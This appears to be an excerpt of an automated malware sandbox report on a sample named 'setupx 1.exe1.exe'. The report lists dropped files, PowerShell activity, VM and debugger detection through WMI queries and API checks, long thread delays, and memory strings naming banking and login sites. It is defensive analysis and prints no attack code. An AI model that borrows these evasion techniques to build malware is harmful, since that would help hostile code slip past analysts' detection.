Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Memory allocated: 4F90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599557	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599122	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599012	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Window / User API: threadDelayed 6445	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Window / User API: threadDelayed 653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Window / User API: threadDelayed 2324	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7539	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2218	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Dropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Dropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exe			Jump to dropped file

Source: C:\Users\user\Desktop\setupx 1.exe1.exe TID: 4732	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe TID: 1696	Thread sleep count: 6445 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7388	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7440	Thread sleep count: 653 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599557s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7440	Thread sleep count: 2324 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 3816	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599122s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -599012s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5976	Thread sleep count: 7539 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932	Thread sleep count: 2218 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5192	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CFFCDE FindFirstFileExW,	0_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00CFFD8F
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CFFCDE FindFirstFileExW,	2_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00CFFD8F

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599557	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599122	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 599012	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr	Binary or memory string: Vmwaretrat
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr	Binary or memory string: vboxservice
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: setupx 1.exe1.exe, 00000002.00000002.2255302659.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182620812.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308691400.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139748232.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113318598.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113138099.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr	Binary or memory string: Vmwareuser
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr	Binary or memory string: vboxtray
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: setupx 1.exe1.exe, 00000002.00000002.2255302659.0000000000F32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1287987853.0000000001344000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr	Binary or memory string: Vmtoolsd
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 0_2_00C8553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,

0_2_00C8553B

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 0_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CEDC9E

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 0_2_00D161B4 mov edi, dword ptr fs:[00000030h]

0_2_00D161B4

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 0_2_00CFB71C GetProcessHeap,

0_2_00CFB71C

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CED8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CED8E2
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CEDC9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CEDC92 SetUnhandledExceptionFilter,	0_2_00CEDC92
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CF5DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CF5DCE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CED8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00CED8E2
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00CEDC9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CF5DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00CF5DCE

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

